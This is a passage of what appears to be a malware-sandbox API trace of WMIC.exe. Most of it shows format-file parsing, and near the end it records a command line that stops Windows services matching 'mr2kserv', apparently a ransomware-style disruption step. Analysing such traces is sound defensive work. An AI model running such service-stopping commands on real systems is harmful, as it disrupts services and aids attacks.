(This=0x1b178d0) returned 0x0 [0251.844] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.844] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=9, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.844] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="texttable.xsl") returned 0x0 [0251.844] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.844] malloc (_Size=0x18) returned 0x43c7a0 [0251.844] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.844] free (_Block=0x43c7a0) [0251.844] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0251.845] malloc (_Size=0x18) returned 0x43c7a0 [0251.845] malloc (_Size=0x18) returned 0x43c7c0 [0251.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.845] SysStringLen (param_1="TABLE") returned 0x5 [0251.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.845] SysStringLen (param_1="VALUE") returned 0x5 [0251.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.845] SysStringLen (param_1="XML") returned 0x3 [0251.845] SysStringLen (param_1="XML") returned 0x3 [0251.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.845] malloc (_Size=0x30) returned 0x4382c0 [0251.845] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.845] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.845] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.845] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=10, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.845] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="texttable.xsl") returned 0x0 [0251.845] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.845] malloc (_Size=0x18) returned 0x43c7e0 [0251.846] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.846] free (_Block=0x43c7e0) [0251.846] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0251.846] malloc (_Size=0x18) returned 0x43c7e0 [0251.846] malloc (_Size=0x18) returned 0x43c800 [0251.846] SysStringLen (param_1="texttablewsys") returned 0xd [0251.846] SysStringLen (param_1="TABLE") returned 0x5 [0251.846] SysStringLen (param_1="texttablewsys") returned 0xd [0251.846] SysStringLen (param_1="XML") returned 0x3 [0251.846] SysStringLen (param_1="texttablewsys") returned 0xd [0251.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.846] SysStringLen (param_1="XML") returned 0x3 [0251.846] SysStringLen (param_1="texttablewsys") returned 0xd [0251.846] malloc (_Size=0x30) returned 0x438300 [0251.846] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.846] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.846] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.846] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=11, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.846] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="texttable.xsl") returned 0x0 [0251.847] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.847] malloc (_Size=0x18) returned 0x43c820 [0251.847] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.847] free (_Block=0x43c820) [0251.847] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0251.847] malloc (_Size=0x18) returned 0x43c820 [0251.847] malloc (_Size=0x18) returned 0x43c840 [0251.847] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.847] SysStringLen (param_1="TABLE") returned 0x5 [0251.847] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.847] SysStringLen (param_1="XML") returned 0x3 [0251.847] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.847] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.847] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.847] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.847] malloc (_Size=0x30) returned 0x438340 [0251.847] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.847] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.848] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.848] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=12, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.848] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="texttable.xsl") returned 0x0 [0251.848] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.848] malloc (_Size=0x18) returned 0x43c860 [0251.848] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.848] free (_Block=0x43c860) [0251.848] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0251.848] malloc (_Size=0x18) returned 0x43c860 [0251.848] malloc (_Size=0x18) returned 0x43c880 [0251.848] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.848] SysStringLen (param_1="TABLE") returned 0x5 [0251.848] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.848] SysStringLen (param_1="XML") returned 0x3 [0251.848] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.848] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.848] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.848] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.849] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.849] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.849] malloc (_Size=0x30) returned 0x438380 [0251.849] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.849] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.849] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.849] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=13, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.849] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="texttable.xsl") returned 0x0 [0251.849] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.849] malloc (_Size=0x18) returned 0x43c8a0 [0251.849] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.849] free (_Block=0x43c8a0) [0251.849] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0251.849] malloc (_Size=0x18) returned 0x43c8a0 [0251.849] malloc (_Size=0x18) returned 0x43c8c0 [0251.849] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.849] SysStringLen (param_1="TABLE") returned 0x5 [0251.850] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.850] SysStringLen (param_1="XML") returned 0x3 [0251.850] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.850] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.850] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.850] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.850] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.850] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.850] malloc (_Size=0x30) returned 0x4383c0 [0251.850] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.850] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.850] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.850] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=14, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.850] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="texttable.xsl") returned 0x0 [0251.850] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.850] malloc (_Size=0x18) returned 0x43c8e0 [0251.850] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.850] free (_Block=0x43c8e0) [0251.850] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0251.851] malloc (_Size=0x18) returned 0x43c8e0 [0251.851] malloc (_Size=0x18) returned 0x43c900 [0251.851] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.851] SysStringLen (param_1="TABLE") returned 0x5 [0251.851] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.851] SysStringLen (param_1="XML") returned 0x3 [0251.851] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.851] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.851] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.851] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.851] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.851] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.851] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.851] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.851] malloc (_Size=0x30) returned 0x438400 [0251.851] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.851] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.851] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.851] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=15, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.851] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="htable.xsl") returned 0x0 [0251.851] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.852] malloc (_Size=0x18) returned 0x43c920 [0251.852] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.852] free (_Block=0x43c920) [0251.852] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0251.852] malloc (_Size=0x18) returned 0x43c920 [0251.852] malloc (_Size=0x18) returned 0x43c940 [0251.852] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.852] SysStringLen (param_1="TABLE") returned 0x5 [0251.852] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.852] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.852] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.852] SysStringLen (param_1="XML") returned 0x3 [0251.852] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.852] SysStringLen (param_1="texttablewsys") returned 0xd [0251.852] SysStringLen (param_1="XML") returned 0x3 [0251.852] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.852] malloc (_Size=0x30) returned 0x438440 [0251.853] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.853] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.853] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.853] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=16, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.853] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="htable.xsl") returned 0x0 [0251.853] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.853] malloc (_Size=0x18) returned 0x43c960 [0251.853] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.853] free (_Block=0x43c960) [0251.853] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0251.853] malloc (_Size=0x18) returned 0x43c960 [0251.853] malloc (_Size=0x18) returned 0x43c980 [0251.853] SysStringLen (param_1="htable-sortby") returned 0xd [0251.853] SysStringLen (param_1="TABLE") returned 0x5 [0251.854] SysStringLen (param_1="htable-sortby") returned 0xd [0251.854] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.854] SysStringLen (param_1="htable-sortby") returned 0xd [0251.854] SysStringLen (param_1="XML") returned 0x3 [0251.854] SysStringLen (param_1="htable-sortby") returned 0xd [0251.854] SysStringLen (param_1="texttablewsys") returned 0xd [0251.854] SysStringLen (param_1="htable-sortby") returned 0xd [0251.854] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.854] SysStringLen (param_1="XML") returned 0x3 [0251.854] SysStringLen (param_1="htable-sortby") returned 0xd [0251.854] malloc (_Size=0x30) returned 0x438480 [0251.854] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.854] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.854] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.854] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=17, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.854] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="mof.xsl") returned 0x0 [0251.854] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.854] malloc (_Size=0x18) returned 0x43c9a0 [0251.854] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.855] free (_Block=0x43c9a0) [0251.855] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0251.855] malloc (_Size=0x18) returned 0x43c9a0 [0251.855] malloc (_Size=0x18) returned 0x43c9c0 [0251.855] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.855] SysStringLen (param_1="TABLE") returned 0x5 [0251.855] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.855] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.855] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.855] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.855] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.855] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.855] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.855] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.855] malloc (_Size=0x30) returned 0x4384c0 [0251.855] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.855] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.855] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.855] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=18, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.855] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="mof.xsl") returned 0x0 [0251.856] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.856] malloc (_Size=0x18) returned 0x43c9e0 [0251.856] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.856] free (_Block=0x43c9e0) [0251.856] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0251.856] malloc (_Size=0x18) returned 0x43c9e0 [0251.857] malloc (_Size=0x18) returned 0x43ca00 [0251.857] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.857] SysStringLen (param_1="TABLE") returned 0x5 [0251.857] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.857] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.857] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.857] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.857] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.857] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.857] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.857] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.857] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.857] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.858] malloc (_Size=0x30) returned 0x438500 [0251.858] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.858] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.858] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.858] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=19, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.858] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="textvaluelist.xsl") returned 0x0 [0251.858] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.858] malloc (_Size=0x18) returned 0x43ca20 [0251.858] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.858] free (_Block=0x43ca20) [0251.858] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0251.858] malloc (_Size=0x18) returned 0x43ca20 [0251.858] malloc (_Size=0x18) returned 0x43ca40 [0251.859] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.859] SysStringLen (param_1="TABLE") returned 0x5 [0251.859] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.859] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.859] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.859] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.859] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.859] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.859] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.859] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.859] malloc (_Size=0x30) returned 0x438540 [0251.859] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.859] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.859] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.859] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=20, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.859] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="textvaluelist.xsl") returned 0x0 [0251.859] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.859] malloc (_Size=0x18) returned 0x43ca60 [0251.860] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.860] free (_Block=0x43ca60) [0251.860] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0251.860] malloc (_Size=0x18) returned 0x43ca60 [0251.860] malloc (_Size=0x18) returned 0x43ca80 [0251.860] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.860] SysStringLen (param_1="TABLE") returned 0x5 [0251.860] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.860] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.860] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.860] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.860] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.860] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.860] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.860] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.860] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.861] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.861] malloc (_Size=0x30) returned 0x438580 [0251.861] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.861] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.861] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.861] IUnknown:Release (This=0x1b19cc0) returned 0x0 [0251.861] FreeThreadedDOMDocument:IUnknown:Release (This=0x1b1bc50) returned 0x1 [0251.861] FreeThreadedDOMDocument:IUnknown:Release (This=0x1b171d0) returned 0x0 [0251.861] free (_Block=0x436f30) [0251.861] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice" [0251.861] malloc (_Size=0xe0) returned 0x436ef0 [0251.861] memcpy_s (in: _Destination=0x436ef0, _DestinationSize=0xde, _Source=0x4425ee, _SourceSize=0xd2 | out: _Destination=0x436ef0) returned 0x0 [0251.861] malloc (_Size=0x18) returned 0x43caa0 [0251.861] malloc (_Size=0x18) returned 0x43cac0 [0251.862] malloc (_Size=0x18) returned 0x43cae0 [0251.862] malloc (_Size=0x18) returned 0x43cb00 [0251.862] malloc (_Size=0x80) returned 0x43cd30 [0251.862] GetLocalTime (in: lpSystemTime=0x24fb30 | out: lpSystemTime=0x24fb30*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0xa, wMilliseconds=0x27e)) [0251.862] _vsnwprintf (in: _Buffer=0x43cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x24fa88 | out: _Buffer="04-28-2020T20:42:10") returned 19 [0251.862] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.862] malloc (_Size=0x8e) returned 0x43cdc0 [0251.862] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.862] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.862] malloc (_Size=0x8e) returned 0x43ce60 [0251.862] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.862] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.862] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.862] malloc (_Size=0xa) returned 0x43cb20 [0251.862] lstrlenW (lpString="path") returned 4 [0251.862] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0251.862] malloc (_Size=0xa) returned 0x43cb40 [0251.862] malloc (_Size=0x8) returned 0x437140 [0251.862] free (_Block=0x0) [0251.862] free (_Block=0x43cb20) [0251.863] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.863] malloc (_Size=0x1c) returned 0x43cf00 [0251.863] lstrlenW (lpString="Win32_Service") returned 13 [0251.863] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0251.863] malloc (_Size=0x1c) returned 0x43cf30 [0251.863] malloc (_Size=0x10) returned 0x43cb20 [0251.863] memmove_s (in: _Destination=0x43cb20, _DestinationSize=0x8, _Source=0x437140, _SourceSize=0x8 | out: _Destination=0x43cb20) returned 0x0 [0251.863] free (_Block=0x437140) [0251.863] free (_Block=0x0) [0251.863] free (_Block=0x43cf00) [0251.863] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.863] malloc (_Size=0xc) returned 0x43cb60 [0251.863] lstrlenW (lpString="where") returned 5 [0251.863] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0251.863] malloc (_Size=0xc) returned 0x43cb80 [0251.863] malloc (_Size=0x18) returned 0x43cba0 [0251.863] memmove_s (in: _Destination=0x43cba0, _DestinationSize=0x10, _Source=0x43cb20, _SourceSize=0x10 | out: _Destination=0x43cba0) returned 0x0 [0251.863] free (_Block=0x43cb20) [0251.863] free (_Block=0x0) [0251.863] free (_Block=0x43cb60) [0251.863] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.863] malloc (_Size=0x36) returned 0x4385c0 [0251.863] lstrlenW (lpString="\"name like '%%mr2kserv%%'\"") returned 26 [0251.863] _wcsicmp (_String1="\"name like '%%mr2kserv%%'\"", _String2="\"NULL\"") returned -20 [0251.863] lstrlenW (lpString="\"name like '%%mr2kserv%%'\"") returned 26 [0251.863] lstrlenW (lpString="\"name like '%%mr2kserv%%'\"") returned 26 [0251.863] malloc (_Size=0x36) returned 0x438600 [0251.864] malloc (_Size=0x20) returned 0x43cf00 [0251.864] memmove_s (in: _Destination=0x43cf00, _DestinationSize=0x18, _Source=0x43cba0, _SourceSize=0x18 | out: _Destination=0x43cf00) returned 0x0 [0251.864] free (_Block=0x43cba0) [0251.864] free (_Block=0x0) [0251.864] free (_Block=0x4385c0) [0251.864] lstrlenW (lpString=" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice") returned 70 [0251.864] malloc (_Size=0xa) returned 0x43cba0 [0251.864] lstrlenW (lpString="call") returned 4 [0251.864] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0251.864] malloc (_Size=0xa) returned 0x43cb60 [0251.864] malloc (_Size=0x30) returned 0x4385c0 [0251.864] memmove_s (in: _Destination=0x4385c0, _DestinationSize=0x20, _Source=0x43cf00, _SourceSize=0x20 | out: _Destination=0x4385c0) returned 0x0 [0251.864] free (_Block=0x43cf00) [0251.864] free (_Block=0x0) [0251.864] free (_Block=0x43cba0) [0251.864] 